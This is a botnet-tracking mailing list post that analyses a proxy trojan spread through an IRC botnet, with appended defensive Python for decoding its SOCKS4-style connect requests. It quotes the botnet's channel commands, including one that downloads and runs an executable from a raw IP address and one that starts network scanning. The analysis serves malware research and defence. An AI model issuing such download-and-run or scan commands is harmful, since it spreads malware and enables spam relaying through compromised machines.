To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
> :irc.fuck.com 332 [00|CZE|823714] #bart# :?asc -S -s|?else status  
> scan ?asc asn 150 5 0 _b _r _e _h|?ge.down http://207.226.22.141/ 
> jjupdatep.exe c:\iexplorer.exe 1

jjupdatep.exe is Proxy.Ranky.Gen.32. It connects to some hardcoded  
domains on port 53 and sends an initialisation string (16 bytes, I  
have no idea about the meaning) on port 53. Then a backdoor is  
opened, according to norman.com on port 42142, according to my  
investigation on port 36334. Now it's being contacted by several  
hosts on this backdoor port and receives a 9 byte string that  
contains 04 01 00 port ww.xx.yy.zz 00. Immediately it tries to  
connect on the provided port. In my investigation it tried to open  
connections on port 25...

cheers
andrej
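
The 9-byte layout quoted above (04 01, two port bytes, four address bytes, 00) is the shape of a SOCKS4 CONNECT request with an empty user ID. The following is an added example, not part of the original message: a small decoder for triaging payloads captured on the backdoor port. The function names and sample bytes are constructed for illustration, and the addresses are documentation ranges.

```python
import ipaddress
import struct

SMTP_PORT = 25  # the destination port observed in the message above


def parse_socks4_connect(payload: bytes):
    """Return (ip, port) for a 9-byte SOCKS4 CONNECT with empty user ID, else None."""
    if len(payload) != 9:
        return None
    # version, command, port (big-endian), IPv4 address, user-ID terminator
    version, command, port, raw_ip, terminator = struct.unpack("!BBH4sB", payload)
    if version != 0x04 or command != 0x01 or terminator != 0x00:
        return None
    return str(ipaddress.IPv4Address(raw_ip)), port


def triage(payloads):
    """Label each captured payload; proxying to port 25 suggests mail relaying."""
    findings = []
    for data in payloads:
        parsed = parse_socks4_connect(data)
        if parsed is None:
            findings.append(("not-socks4-connect", None, None))
            continue
        ip, port = parsed
        label = "proxy-to-smtp" if port == SMTP_PORT else "proxy-connect"
        findings.append((label, ip, port))
    return findings


# Constructed sample payloads (not taken from the original capture).
SAMPLES = [
    bytes.fromhex("04010019c000020a00"),  # CONNECT 192.0.2.10:25
    bytes.fromhex("04010050c633640700"),  # CONNECT 198.51.100.7:80
    bytes.fromhex("05010019c000020a00"),  # wrong version byte
    bytes.fromhex("04010019c000020a"),    # truncated, no terminator
]

if __name__ == "__main__":
    for label, ip, port in triage(SAMPLES):
        print(label, ip, port)
```

Because the message reports two different listener ports (42142 and 36334), matching on the payload shape is more dependable than matching on a fixed port number.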


_______________________________________________
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets